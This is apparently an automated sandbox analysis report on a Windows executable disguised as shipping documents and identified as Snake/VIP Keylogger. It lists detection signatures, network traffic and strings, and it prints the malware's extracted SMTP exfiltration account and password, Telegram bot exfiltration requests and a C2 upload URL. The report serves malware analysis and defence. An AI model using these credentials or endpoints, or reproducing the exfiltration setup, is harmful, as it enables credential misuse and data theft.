Windows Analysis Report
rShippingDocuments240384.exe

Overview

General Information

Sample name: rShippingDocuments240384.exe
Analysis ID: 1544369
MD5: 70338f79bb11ee88003ea5f2d0d363c1
SHA1: 85d426e23b7223faacea8b78c6de345098ccfbad
SHA256: 50bcb2857ce3d005fad3479253fa1c7a8cf0cd667c16d9d7c292d9307011dadf
Tags: exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587", "Version": "4.4"}
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\tdcorV.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: rShippingDocuments240384.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: rShippingDocuments240384.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: rShippingDocuments240384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.8:51299 -> 188.114.97.3:443 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:51300 version: TLS 1.2
Source: rShippingDocuments240384.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: dKuN.pdb source: rShippingDocuments240384.exe, tdcorV.exe.0.dr
Source: Binary string: dKuN.pdbSHA256 source: rShippingDocuments240384.exe, tdcorV.exe.0.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 013BF45Dh 9_2_013BF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 013BF45Dh 9_2_013BF52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 013BF45Dh 9_2_013BF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 013BFC19h 9_2_013BF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 030AF45Dh 14_2_030AF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 030AF45Dh 14_2_030AF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 030AFC19h 14_2_030AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9E501h 14_2_06C9E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C90D0Dh 14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C91697h 14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C931E0h 14_2_06C92DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C92C19h 14_2_06C92968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9E959h 14_2_06C9E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9E0A9h 14_2_06C9DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9F661h 14_2_06C9F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9F209h 14_2_06C9EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9EDB1h 14_2_06C9EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9D3A1h 14_2_06C9D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9CF49h 14_2_06C9CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06C90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9FAB9h 14_2_06C9F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C931E0h 14_2_06C92DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9DC51h 14_2_06C9D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C9D7F9h 14_2_06C9D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06C931E0h 14_2_06C9310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:51301 -> 166.62.28.124:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 188.114.97.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.8:51301 -> 166.62.28.124:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.8:51299 -> 188.114.97.3:443 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.bulatpharmaceutical.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 09:32:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 09:32:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
